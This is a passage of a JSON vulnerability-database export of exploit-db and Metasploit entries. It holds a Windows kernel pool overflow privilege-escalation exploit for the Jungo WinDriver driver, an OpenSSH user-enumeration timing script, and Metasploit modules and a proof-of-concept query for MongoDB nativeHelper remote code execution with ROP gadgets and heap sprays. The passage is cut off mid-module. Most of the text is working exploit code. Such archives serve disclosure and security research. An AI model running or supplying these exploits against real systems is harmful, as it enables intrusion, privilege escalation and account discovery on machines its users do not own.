GENERIC_WRITE = 0x40000000\r\n OPEN_EXISTING = 0x3\r\n DEVICE_NAME = \"\\\\\\\\.\\\\WinDrvr1240\"\r\n dwReturn = c_ulong()\r\n driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)\r\n inputbuffer = 0x41414141\r\n inputbuffer_size = 0x5000\r\n outputbuffer_size = 0x5000\r\n outputbuffer = 0x20000000\r\n alloc_pool_overflow_buffer(inputbuffer, inputbuffer_size)\r\n IoStatusBlock = c_ulong()\r\n\r\n if driver_handle:\r\n dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, None, None, None, byref(IoStatusBlock), 0x953824b7,\r\n inputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size)\r\n return True\r\n return False\r\n\r\ndef we_can_make_pool_holes():\r\n \"\"\"\r\n This makes the pool holes that will coalesce into a hole of size 0x460.\r\n \"\"\"\r\n global khandlesd\r\n mypid = os.getpid()\r\n khandlesd = {}\r\n khandlesl = []\r\n \r\n # leak kernel handles\r\n for pid, handle, obj in get_handles():\r\n\r\n # mixed object attack\r\n if pid == mypid and (get_type_info(handle) == \"Event\" or get_type_info(handle) == \"IoCompletionReserve\"):\r\n khandlesd[obj] = handle\r\n khandlesl.append(obj)\r\n\r\n # Find holes and make our allocation\r\n holes = []\r\n for obj in khandlesl:\r\n\r\n # obj address is the handle address, but we want to allocation\r\n # address, so we just remove the size of the object header from it.\r\n alloc = obj - 0x30\r\n\r\n # Get allocations at beginning of the page\r\n if (alloc & 0xfffff000) == alloc:\r\n bin = []\r\n\r\n # object sizes\r\n CreateEvent_size = 0x40\r\n IoCompletionReserve_size = 0x60\r\n combined_size = CreateEvent_size + IoCompletionReserve_size\r\n\r\n # after the 0x20 chunk hole, the first object will be the IoCompletionReserve object\r\n offset = IoCompletionReserve_size \r\n for i in range(offset, offset + (7 * combined_size), combined_size):\r\n try:\r\n # chunks need to be next to each other for the coalesce to take effect\r\n bin.append(khandlesd[obj + i])\r\n bin.append(khandlesd[obj + i - IoCompletionReserve_size])\r\n except KeyError:\r\n pass\r\n\r\n # make sure it's contiguously allocated memory\r\n if len(tuple(bin)) == 14:\r\n holes.append(tuple(bin))\r\n\r\n # make the holes to fill\r\n for hole in holes:\r\n for handle in hole:\r\n kernel32.CloseHandle(handle)\r\n return True\r\n\r\ndef trigger_lpe():\r\n \"\"\"\r\n This function frees the IoCompletionReserve objects and this triggers the \r\n registered aexit, which is our controlled pointer to OkayToCloseProcedure.\r\n \"\"\"\r\n # free the corrupted chunk to trigger OkayToCloseProcedure\r\n for k, v in khandlesd.iteritems():\r\n kernel32.CloseHandle(v)\r\n os.system(\"cmd.exe\")\r\n\r\ndef main():\r\n print \"\\n\\t--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]\"\r\n print \"\\t Steven Seeley (mr_me) of Source Incite\\r\\n\"\r\n\r\n if release() != \"7\" or architecture()[0] != \"32bit\":\r\n print \"(-) although this exploit may work on this system,\"\r\n print \" it was only designed for Windows 7 x86.\"\r\n sys.exit(-1)\r\n\r\n print \"(+) spraying pool with mixed objects...\"\r\n if we_can_spray():\r\n print \"(+) sprayed the pool!\"\r\n print \"(+) making pool holes...\"\r\n if we_can_make_pool_holes():\r\n print \"(+) made the pool holes!\"\r\n print \"(+) allocating shellcode...\"\r\n if we_can_alloc_shellcode():\r\n print \"(+) allocated the shellcode!\"\r\n print \"(+) triggering pool overflow...\"\r\n if we_can_trigger_the_pool_overflow():\r\n print \"(+) elevating privileges!\"\r\n trigger_lpe()\r\n\r\nif __name__ == '__main__':\r\n main()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42624/"}, {"lastseen": "2016-07-18T13:28:25", "bulletinFamily": "exploit", "description": "OpenSSHD <= 7.2p2 - User Enumeration. CVE-2016-6210. Remote exploit for Linux platform", "modified": "2016-07-18T00:00:00", "published": "2016-07-18T00:00:00", "id": "EDB-ID:40113", "href": "https://www.exploit-db.com/exploits/40113/", "type": "exploitdb", "title": "OpenSSHD <= 7.2p2 - User Enumeration", "sourceData": "Source: http://seclists.org/fulldisclosure/2016/Jul/51\r\n\r\n--------------------------------------------------------------------\r\nUser Enumeration using Open SSHD (<=Latest version).\r\n-------------------------------------------------------------------\r\n\r\nAbstract:\r\n-----------\r\nBy sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most \r\nmodern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash.\r\n\r\nCVE-ID\r\n---------\r\nCVE-2016-6210\r\n\r\nTested versions\r\n--------------------\r\nThis issue was tested on : opensshd-7.2p2 ( should be possible on most earlier versions as well).\r\n\r\nFix\r\n-----------------\r\nThis issue was reported to OPENSSH developer group and they have sent a patch ( don't know if patch was released yet).\r\n(thanks to 'dtucker () zip com au' for his quick reply and fix suggestion).\r\n\r\nDetails\r\n----------------\r\nWhen SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD \r\nsource code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm.\r\nIf real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter \r\nresponse time from the server for non-existing users.\r\n\r\nSample code:\r\n----------------\r\nimport paramiko\r\nimport time\r\nuser=raw_input(\"user: \")\r\np='A'*25000\r\nssh = paramiko.SSHClient()\r\nstarttime=time.clock()\r\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\ntry:\r\n ssh.connect('127.0.0.1', username=user,\r\n password=p)\r\nexcept:\r\n endtime=time.clock()\r\ntotal=endtime-starttime\r\nprint(total)\r\n\r\n(Valid users will result in higher total time).\r\n\r\n*** please note that if SSHD configuration prohibits root login , then root is not considered as valid user...\r\n\r\n*** when TCP timestamp option is enabled the best way to measure the time would be using timestamps from the TCP \r\npackets of the server, since this will eliminate any network delays on the way.\r\n\r\nEddie Harari", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40113/"}, {"lastseen": "2016-02-03T00:18:31", "bulletinFamily": "exploit", "description": "MongoDB nativeHelper.apply Remote Code Execution. CVE-2013-1892. Remote exploit for linux platform", "modified": "2013-04-08T00:00:00", "published": "2013-04-08T00:00:00", "id": "EDB-ID:24935", "href": "https://www.exploit-db.com/exploits/24935/", "type": "exploitdb", "title": "MongoDB nativeHelper.apply Remote Code Execution", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'MongoDB nativeHelper.apply Remote Code Execution',\r\n 'Description' => %q{\r\n This module exploit a the nativeHelper feature from spiderMonkey which allows to\r\n to control execution by calling it wit specially crafted arguments. This module\r\n has been tested successfully on MongoDB 2.2.3 on Ubuntu 10.04 and Debian Squeeze.\r\n },\r\n 'Author' =>\r\n [\r\n 'agix' # @agixid # Vulnerability discovery and Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1892' ],\r\n [ 'OSVDB', '91632' ],\r\n [ 'BID', '58695' ],\r\n [ 'URL', 'http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/' ]\r\n ],\r\n 'Platform' => 'linux',\r\n 'Targets' =>\r\n [\r\n [ 'Linux - mongod 2.2.3 - 32bits',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'mmap' => [\r\n 0x0816f768, # mmap64@plt # from mongod\r\n 0x08666d07, # add esp, 0x14 / pop ebx / pop ebp / ret # from mongod\r\n 0x31337000,\r\n 0x00002000,\r\n 0x00000007,\r\n 0x00000031,\r\n 0xffffffff,\r\n 0x00000000,\r\n 0x00000000,\r\n 0x0816e4c8, # memcpy@plt # from mongod\r\n 0x31337000,\r\n 0x31337000,\r\n 0x0c0b0000,\r\n 0x00002000\r\n ],\r\n 'ret' => 0x08055a70, # ret # from mongod\r\n 'gadget1' => 0x0836e204, # mov eax,DWORD PTR [eax] / call DWORD PTR [eax+0x1c]\r\n # These gadgets need to be composed with bytes < 0x80\r\n 'gadget2' => 0x08457158, # xchg esp,eax / add esp,0x4 / pop ebx / pop ebp / ret <== this gadget must xchg esp,eax and then increment ESP\r\n 'gadget3' => 0x08351826, # add esp,0x20 / pop esi / pop edi / pop ebp <== this gadget placed before gadget2 increment ESP to escape gadget2\r\n 'gadget4' => 0x08055a6c, # pop eax / ret\r\n 'gadget5' => 0x08457158 # xchg esp,eax\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Mar 24 2013',\r\n 'License' => MSF_LICENSE\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(27017),\r\n OptString.new('DB', [ true, \"Database to use\", \"admin\"]),\r\n OptString.new('COLLECTION', [ false, \"Collection to use (it must to exist). Better to let empty\", \"\"]),\r\n OptString.new('USERNAME', [ false, \"Login to use\", \"\"]),\r\n OptString.new('PASSWORD', [ false, \"Password to use\", \"\"])\r\n ], self.class)\r\n end\r\n\r\n def exploit\r\n begin\r\n connect\r\n if require_auth?\r\n print_status(\"Mongo server #{datastore['RHOST']} use authentication...\")\r\n if !datastore['USERNAME'] || !datastore['PASSWORD']\r\n disconnect\r\n fail_with(Exploit::Failure::BadConfig, \"USERNAME and PASSWORD must be provided\")\r\n end\r\n if do_login==0\r\n disconnect\r\n fail_with(Exploit::Failure::NoAccess, \"Authentication failed\")\r\n end\r\n else\r\n print_good(\"Mongo server #{datastore['RHOST']} doesn't use authentication\")\r\n end\r\n\r\n if datastore['COLLECTION'] && datastore['COLLECTION'] != \"\"\r\n collection = datastore['COLLECTION']\r\n else\r\n collection = Rex::Text.rand_text(4, nil, 'abcdefghijklmnopqrstuvwxyz')\r\n if read_only?(collection)\r\n disconnect\r\n fail_with(Exploit::Failure::BadConfig, \"#{datastore['USERNAME']} has read only access, please provide an existent collection\")\r\n else\r\n print_good(\"New document created in collection #{collection}\")\r\n end\r\n end\r\n\r\n print_status(\"Let's exploit, heap spray could take some time...\")\r\n my_target = target\r\n shellcode = Rex::Text.to_unescape(payload.encoded)\r\n mmap = my_target['mmap'].pack(\"V*\")\r\n ret = [my_target['ret']].pack(\"V*\")\r\n gadget1 = \"0x#{my_target['gadget1'].to_s(16)}\"\r\n gadget2 = Rex::Text.to_hex([my_target['gadget2']].pack(\"V\"))\r\n gadget3 = Rex::Text.to_hex([my_target['gadget3']].pack(\"V\"))\r\n gadget4 = Rex::Text.to_hex([my_target['gadget4']].pack(\"V\"))\r\n gadget5 = Rex::Text.to_hex([my_target['gadget5']].pack(\"V\"))\r\n\r\n shellcode_var=\"a\"+Rex::Text.rand_text_hex(4)\r\n sizechunk_var=\"b\"+Rex::Text.rand_text_hex(4)\r\n chunk_var=\"c\"+Rex::Text.rand_text_hex(4)\r\n i_var=\"d\"+Rex::Text.rand_text_hex(4)\r\n array_var=\"e\"+Rex::Text.rand_text_hex(4)\r\n\r\n ropchain_var=\"f\"+Rex::Text.rand_text_hex(4)\r\n chunk2_var=\"g\"+Rex::Text.rand_text_hex(4)\r\n array2_var=\"h\"+Rex::Text.rand_text_hex(4)\r\n\r\n # nopsled + shellcode heapspray\r\n payload_js = shellcode_var+'=unescape(\"'+shellcode+'\");'\r\n payload_js << sizechunk_var+'=0x1000;'\r\n payload_js << chunk_var+'=\"\";'\r\n payload_js << 'for('+i_var+'=0;'+i_var+'<'+sizechunk_var+';'+i_var+'++){ '+chunk_var+'+=unescape(\"%u9090%u9090\"); } '\r\n payload_js << chunk_var+'='+chunk_var+'.substring(0,('+sizechunk_var+'-'+shellcode_var+'.length));'\r\n payload_js << array_var+'=new Array();'\r\n payload_js << 'for('+i_var+'=0;'+i_var+'<25000;'+i_var+'++){ '+array_var+'['+i_var+']='+chunk_var+'+'+shellcode_var+'; } '\r\n\r\n # retchain + ropchain heapspray\r\n payload_js << ropchain_var+'=unescape(\"'+Rex::Text.to_unescape(mmap)+'\");'\r\n payload_js << chunk2_var+'=\"\";'\r\n payload_js << 'for('+i_var+'=0;'+i_var+'<'+sizechunk_var+';'+i_var+'++){ '+chunk2_var+'+=unescape(\"'+Rex::Text.to_unescape(ret)+'\"); } '\r\n payload_js << chunk2_var+'='+chunk2_var+'.substring(0,('+sizechunk_var+'-'+ropchain_var+'.length));'\r\n payload_js << array2_var+'=new Array();'\r\n payload_js << 'for('+i_var+'=0;'+i_var+'<25000;'+i_var+'++){ '+array2_var+'['+i_var+']='+chunk2_var+'+'+ropchain_var+'; } '\r\n\r\n # Trigger and first ropchain\r\n payload_js << 'nativeHelper.apply({\"x\" : '+gadget1+'}, '\r\n payload_js << '[\"A\"+\"'+gadget3+'\"+\"'+Rex::Text.rand_text_hex(12)+'\"+\"'+gadget2+'\"+\"'+Rex::Text.rand_text_hex(28)+'\"+\"'+gadget4+'\"+\"\\\\x20\\\\x20\\\\x20\\\\x20\"+\"'+gadget5+'\"]);'\r\n\r\n request_id = Rex::Text.rand_text(4)\r\n\r\n packet = request_id #requestID\r\n packet << \"\\xff\\xff\\xff\\xff\" #responseTo\r\n packet << \"\\xd4\\x07\\x00\\x00\" #opCode (2004 OP_QUERY)\r\n packet << \"\\x00\\x00\\x00\\x00\" #flags\r\n packet << datastore['DB']+\".\"+collection+\"\\x00\" #fullCollectionName (db.collection)\r\n packet << \"\\x00\\x00\\x00\\x00\" #numberToSkip (0)\r\n packet << \"\\x01\\x00\\x00\\x00\" #numberToReturn (1)\r\n\r\n where = \"\\x02\\x24\\x77\\x68\\x65\\x72\\x65\\x00\"\r\n where << [payload_js.length+4].pack(\"L\")\r\n where << payload_js+\"\\x00\"\r\n\r\n where.insert(0, [where.length + 4].pack(\"L\"))\r\n\r\n packet += where\r\n packet.insert(0, [packet.length + 4].pack(\"L\"))\r\n\r\n sock.put(packet)\r\n\r\n disconnect\r\n rescue ::Exception => e\r\n fail_with(Exploit::Failure::Unreachable, \"Unable to connect\")\r\n end\r\n end\r\n\r\n def require_auth?\r\n request_id = Rex::Text.rand_text(4)\r\n packet = \"\\x3f\\x00\\x00\\x00\" #messageLength (63)\r\n packet << request_id #requestID\r\n packet << \"\\xff\\xff\\xff\\xff\" #responseTo\r\n packet << \"\\xd4\\x07\\x00\\x00\" #opCode (2004 OP_QUERY)\r\n packet << \"\\x00\\x00\\x00\\x00\" #flags\r\n packet << \"\\x61\\x64\\x6d\\x69\\x6e\\x2e\\x24\\x63\\x6d\\x64\\x00\" #fullCollectionName (admin.$cmd)\r\n packet << \"\\x00\\x00\\x00\\x00\" #numberToSkip (0)\r\n packet << \"\\x01\\x00\\x00\\x00\" #numberToReturn (1)\r\n #query ({\"listDatabases\"=>1})\r\n packet << \"\\x18\\x00\\x00\\x00\\x10\\x6c\\x69\\x73\\x74\\x44\\x61\\x74\\x61\\x62\\x61\\x73\\x65\\x73\\x00\\x01\\x00\\x00\\x00\\x00\"\r\n\r\n sock.put(packet)\r\n response = sock.get_once\r\n\r\n have_auth_error?(response)\r\n end\r\n\r\n def read_only?(collection)\r\n request_id = Rex::Text.rand_text(4)\r\n _id = \"\\x07_id\\x00\"+Rex::Text.rand_text(12)+\"\\x02\"\r\n key = Rex::Text.rand_text(4, nil, 'abcdefghijklmnopqrstuvwxyz')+\"\\x00\"\r\n value = Rex::Text.rand_text(4, nil, 'abcdefghijklmnopqrstuvwxyz')+\"\\x00\"\r\n\r\n insert = _id+key+[value.length].pack(\"L\")+value+\"\\x00\"\r\n\r\n packet = [insert.length+24+datastore['DB'].length+6].pack(\"L\") #messageLength\r\n packet << request_id #requestID\r\n packet << \"\\xff\\xff\\xff\\xff\" #responseTo\r\n packet << \"\\xd2\\x07\\x00\\x00\" #opCode (2002 Insert Document)\r\n packet << \"\\x00\\x00\\x00\\x00\" #flags\r\n packet << datastore['DB'] + \".\" + collection + \"\\x00\" #fullCollectionName (DB.collection)\r\n packet << [insert.length+4].pack(\"L\")\r\n packet << insert\r\n\r\n sock.put(packet)\r\n\r\n request_id = Rex::Text.rand_text(4)\r\n\r\n packet = [datastore['DB'].length + 61].pack(\"L\") #messageLength (66)\r\n packet << request_id #requestID\r\n packet << \"\\xff\\xff\\xff\\xff\" #responseTo\r\n packet << \"\\xd4\\x07\\x00\\x00\" #opCode (2004 Query)\r\n packet << \"\\x00\\x00\\x00\\x00\" #flags\r\n packet << datastore['DB'] + \".$cmd\" + \"\\x00\" #fullCollectionName (DB.$cmd)\r\n packet << \"\\x00\\x00\\x00\\x00\" #numberToSkip (0)\r\n packet << \"\\xff\\xff\\xff\\xff\" #numberToReturn (1)\r\n packet << \"\\x1b\\x00\\x00\\x00\"\r\n packet << \"\\x01\\x67\\x65\\x74\\x6c\\x61\\x73\\x74\\x65\\x72\\x72\\x6f\\x72\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x3f\\x00\"\r\n\r\n sock.put(packet)\r\n\r\n response = sock.get_once\r\n have_auth_error?(response)\r\n end\r\n\r\n def do_login\r\n print_status(\"Trying #{datastore['USERNAME']}/#{datastore['PASSWORD']} on #{datastore['DB']} database\")\r\n nonce = get_nonce\r\n status = auth(nonce)\r\n return status\r\n end\r\n\r\n def auth(nonce)\r\n request_id = Rex::Text.rand_text(4)\r\n packet = request_id #requestID\r\n packet << \"\\xff\\xff\\xff\\xff\" #responseTo\r\n packet << \"\\xd4\\x07\\x00\\x00\" #opCode (2004 OP_QUERY)\r\n packet << \"\\x00\\x00\\x00\\x00\" #flags\r\n packet << datastore['DB'] + \".$cmd\" + \"\\x00\" #fullCollectionName (DB.$cmd)\r\n packet << \"\\x00\\x00\\x00\\x00\" #numberToSkip (0)\r\n packet << \"\\xff\\xff\\xff\\xff\" #numberToReturn (1)\r\n\r\n #{\"authenticate\"=>1.0, \"user\"=>\"root\", \"nonce\"=>\"94e963f5b7c35146\", \"key\"=>\"61829b88ee2f8b95ce789214d1d4f175\"}\r\n document = \"\\x01\\x61\\x75\\x74\\x68\\x65\\x6e\\x74\\x69\\x63\\x61\\x74\\x65\"\r\n document << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x3f\\x02\\x75\\x73\\x65\\x72\\x00\"\r\n document << [datastore['USERNAME'].length + 1].pack(\"L\") # +1 due null byte termination\r\n document << datastore['USERNAME'] + \"\\x00\"\r\n document << \"\\x02\\x6e\\x6f\\x6e\\x63\\x65\\x00\\x11\\x00\\x00\\x00\"\r\n document << nonce + \"\\x00\"\r\n document << \"\\x02\\x6b\\x65\\x79\\x00\\x21\\x00\\x00\\x00\"\r\n document << Rex::Text.md5(nonce + datastore['USERNAME'] + Rex::Text.md5(datastore['USERNAME'] + \":mongo:\" + datastore['PASSWORD'])) + \"\\x00\"\r\n document << \"\\x00\"\r\n #Calculate document length\r\n document.insert(0, [document.length + 4].pack(\"L\"))\r\n\r\n packet += document\r\n\r\n #Calculate messageLength\r\n packet.insert(0, [(packet.length + 4)].pack(\"L\")) #messageLength\r\n sock.put(packet)\r\n response = sock.get_once\r\n if have_auth_error?(response)\r\n print_error(\"Bad login or DB\")\r\n return 0\r\n else\r\n print_good(\"Successful login on DB #{datastore['db']}\")\r\n return 1\r\n end\r\n\r\n\r\n end\r\n\r\n def get_nonce\r\n request_id = Rex::Text.rand_text(4)\r\n packet = [datastore['DB'].length + 57].pack(\"L\") #messageLength (57+DB.length)\r\n packet << request_id #requestID\r\n packet << \"\\xff\\xff\\xff\\xff\" #responseTo\r\n packet << \"\\xd4\\x07\\x00\\x00\" #opCode (2004 OP_QUERY)\r\n packet << \"\\x00\\x00\\x00\\x00\" #flags\r\n packet << datastore['DB'] + \".$cmd\" + \"\\x00\" #fullCollectionName (DB.$cmd)\r\n packet << \"\\x00\\x00\\x00\\x00\" #numberToSkip (0)\r\n packet << \"\\x01\\x00\\x00\\x00\" #numberToReturn (1)\r\n #query {\"getnonce\"=>1.0}\r\n packet << \"\\x17\\x00\\x00\\x00\\x01\\x67\\x65\\x74\\x6e\\x6f\\x6e\\x63\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x3f\\x00\"\r\n\r\n sock.put(packet)\r\n response = sock.get_once\r\n documents = response[36..1024]\r\n #{\"nonce\"=>\"f785bb0ea5edb3ff\", \"ok\"=>1.0}\r\n nonce = documents[15..30]\r\n end\r\n\r\n def have_auth_error?(response)\r\n #Response header 36 bytes long\r\n documents = response[36..1024]\r\n #{\"errmsg\"=>\"auth fails\", \"ok\"=>0.0}\r\n #{\"errmsg\"=>\"need to login\", \"ok\"=>0.0}\r\n if documents.include?('errmsg') || documents.include?('unauthorized')\r\n return true\r\n else\r\n return false\r\n end\r\n end\r\nend", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24935/"}, {"lastseen": "2016-02-03T00:19:42", "bulletinFamily": "exploit", "description": "MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution. CVE-2013-1892. Remote exploit for linux platform", "modified": "2013-04-08T00:00:00", "published": "2013-04-08T00:00:00", "id": "EDB-ID:24947", "href": "https://www.exploit-db.com/exploits/24947/", "type": "exploitdb", "title": "MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution", "sourceData": "#Title: MongoDB nativeHelper.apply Remote Code Execution\r\n#Author: agixid http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/\r\n#Software Link: http://fastdl.mongodb.org/linux/mongodb-linux-i686-2.2.3.tgz\r\n#Version: 2.2.3\r\n\r\nThe following PoC exploits the \"nativeHelper\" feature in the spidermonkey mongodb implementation.\r\nthe NativeFunction \"func\" come from \"x\" javascript object and then is called without any check:\r\n\r\ndb.my_collection.find({'$where':'shellcode=unescape(\"METASPLOIT JS GENERATED SHELLCODE\"); sizechunk=0x1000; chunk=\"\"; for(i=0;i<sizechunk;i++){ chunk+=unescape(\"%u9090%u9090\"); } chunk=chunk.substring(0,(sizechunk-shellcode.length)); testarray=new Array(); for(i=0;i<25000;i++){ testarray[i]=chunk+shellcode; } ropchain=unescape(\"%uf768%u0816%u0c0c%u0c0c%u0000%u0c0c%u1000%u0000%u0007%u0000%u0031%u0000%uffff%uffff%u0000%u0000\"); sizechunk2=0x1000; chunk2=\"\"; for(i=0;i<sizechunk2;i++){ chunk2+=unescape(\"%u5a70%u0805\"); } chunk2=chunk2.substring(0,(sizechunk2-ropchain.length)); testarray2=new Array(); for(i=0;i<25000;i++){ testarray2[i]=chunk2+ropchain; } nativeHelper.apply({\"x\" : 0x836e204}, [\"A\"+\"\\x26\\x18\\x35\\x08\"+\"MongoSploit!\"+\"\\x58\\x71\\x45\\x08\"+\"sthack is a nice place to be\"+\"\\x6c\\x5a\\x05\\x08\"+\"\\x20\\x20\\x20\\x20\"+\"\\x58\\x71\\x45\\x08\"]);'})", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24947/"}], "metasploit": [{"lastseen": "2019-04-09T02:02:37", "bulletinFamily": "exploit", "description": "This module exploits the nativeHelper feature from spiderMonkey which allows remote code execution by calling it with specially crafted arguments. This module has been tested successfully on MongoDB 2.2.3 on Ubuntu 10.04 and Debian Squeeze.", "modified": "2018-08-10T04:34:03", "published": "2013-03-28T02:10:38", "id": "MSF:EXPLOIT/LINUX/MISC/MONGOD_NATIVE_HELPER", "href": "", "type": "metasploit", "title": "MongoDB nativeHelper.apply Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'MongoDB nativeHelper.apply Remote Code Execution',\n 'Description' => %q{\n This module exploits the nativeHelper feature from spiderMonkey which allows\n remote code execution by calling it with specially crafted arguments. This module\n has been tested successfully on MongoDB 2.2.3 on Ubuntu 10.04 and Debian Squeeze.\n },\n 'Author' =>\n [\n 'agix' # @agixid # Vulnerability discovery and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1892' ],\n [ 'OSVDB', '91632' ],\n [ 'BID', '58695' ],\n [ 'URL', 'http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/' ]\n ],\n 'Platform' => 'linux',\n 'Targets' =>\n [\n [ 'Linux - mongod 2.2.3 - 32bits',\n {\n 'Arch' => ARCH_X86,\n 'mmap' => [\n 0x0816f768,\t# mmap64@plt # from mongod\n 0x08666d07, # add esp, 0x14 / pop ebx / pop ebp / ret # from mongod\n 0x31337000,\n 0x00002000,\n 0x00000007,\n 0x00000031,\n 0xffffffff,\n 0x00000000,\n 0x00000000,\n 0x0816e4c8,\t# memcpy@plt # from mongod\n 0x31337000,\n 0x31337000,\n 0x0c0b0000,\n 0x00002000\n ],\n 'ret' => 0x08055a70, # ret # from mongod\n 'gadget1' => 0x0836e204, # mov eax,DWORD PTR [eax] / call DWORD PTR [eax+0x1c]\n # These gadgets need to be composed with bytes < 0x80\n 'gadget2' => 0x08457158, # xchg esp,eax / add esp,0x4 / pop ebx / pop ebp / ret <== this gadget must xchg esp,eax and then increment ESP\n 'gadget3' => 0x08351826, # add esp,0x20 / pop esi / pop edi / pop ebp <== this gadget placed before gadget2 increment ESP to escape gadget2\n 'gadget4' => 0x08055a6c, # pop eax / ret\n 'gadget5' => 0x08457158 # xchg esp,eax\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Mar 24 2013',\n 'License' => MSF_LICENSE\n ))\n\n register_options(\n [\n Opt::RPORT(27017),\n OptString.new('DB', [ true, \"Database to use\", \"admin\"]),\n OptString.new('COLLECTION', [ false, \"Collection to use (it must to exist). Better to let empty\", \"\"]),\n OptString.new('USERNAME', [ true, \"Login to use\", \"\"]),\n OptString.new('PASSWORD', [ true, \"Password to use\", \"\"])\n ])\n end\n\n def exploit\n begin\n connect\n if require_auth?\n print_status(\"Mongo server #{datastore['RHOST']} use authentication...\")\n if !datastore['USERNAME'] || !datastore['PASSWORD']\n disconnect\n fail_with(Failure::BadConfig, \"USERNAME and PASSWORD must be provided\")\n end\n if do_login==0\n disconnect\n fail_with(Failure::NoAccess, \"Authentication failed\")\n end\n else\n print_good(\"Mongo server #{datastore['RHOST']} doesn't use authentication\")\n end\n\n if datastore['COLLECTION'] && datastore['COLLECTION'] != \"\"\n collection = datastore['COLLECTION']\n else\n collection = Rex::Text.rand_text(4, nil, 'abcdefghijklmnopqrstuvwxyz')\n if read_only?(collection)\n disconnect\n fail_with(Failure::BadConfig, \"#{datastore['USERNAME']} has read only access, please provide an existent collection\")\n else\n print_good(\"New document created in collection #{collection}\")\n end\n end\n\n print_status(\"Let's exploit, heap spray could take some time...\")\n my_target = target\n shellcode = Rex::Text.to_unescape(payload.encoded)\n mmap = my_target['mmap'].pack(\"V*\")\n ret = [my_target['ret']].pack(\"V*\")\n gadget1 = \"0x#{my_target['gadget1'].to_s(16)}\"\n gadget2 = Rex::Text.to_hex([my_target['gadget2']].pack(\"V\"))\n gadget3 = Rex::Text.to_hex([my_target['gadget3']].pack(\"V\"))\n gadget4 = Rex::Text.to_hex([my_target['gadget4']].pack(\"V\"))\n gadget5 = Rex::Text.to_hex([my_target['gadget5']].pack(\"V\"))\n\n shellcode_var=\"a\"+Rex::Text.rand_text_hex(4)\n sizechunk_var=\"b\"+Rex::Text.rand_text_hex(4)\n chunk_var=\"c\"+Rex::Text.rand_text_hex(4)\n i_var=\"d\"+Rex::Text.rand_text_hex(4)\n array_var=\"e\"+Rex::Text.rand_text_hex(4)\n\n ropchain_var=\"f\"+Rex::Text.rand_text_hex(4)\n chunk2_var=\"g\"+Rex::Text.rand_text_hex(4)\n array2_var=\"h\"+Rex::Text.rand_text_hex(4)\n\n # nopsled + shellcode heapspray\n payload_js = shellcode_var+'=unescape(\"'+shellcode+'\");'\n payload_js << sizechunk_var+'=0x1000;'\n payload_js << chunk_var+'=\"\";'\n payload_js << 'for('+i_var+'=0;'+i_var+'<'+sizechunk_var+';'+i_var+'++){ '+chunk_var+'+=unescape(\"%u9090%u9090\"); } '\n payload_js << chunk_var+'='+chunk_var+'.substring(0,('+sizechunk_var+'-'+shellcode_var+'.length));'\n payload_js << array_var+'=new Array();'\n payload_js << 'for('+i_var+'=0;'+i_var+'<25000;'+i_var+'++){ '+array_var+'['+i_var+']='+chunk_var+'+'+shellcode_var+'; } '\n\n # retchain + ropchain heapspray\n payload_js << ropchain_var+'=unescape(\"'+Rex::Text.to_unescape(mmap)+'\");'\n payload_js << chunk2_var+'=\"\";'\n payload_js << 'for('+i_var+'=0;'+i_var+'<'+sizechunk_var+';'+i_var+'++){ '+chunk2_var+'+=unescape(\"'+Rex::Text.to_unescape(ret)+'\"); } '\n payload_js << chunk2_var+'='+chunk2_var+'.substring(0,('+sizechunk_var+'-'+ropchain_var+'.length));'\n payload_js << array2_var+'=new Array();'\n payload_js << 'for('+i_var+'=0;'+i_var+'<25000;'+i_var+'++){ '+array2_var+'['+i_var+']='+chunk2_var+'+'+ropchain_var+'; } '\n\n # Trigger and first ropchain\n payload_js << 'nativeHelper.apply({\"x\" : 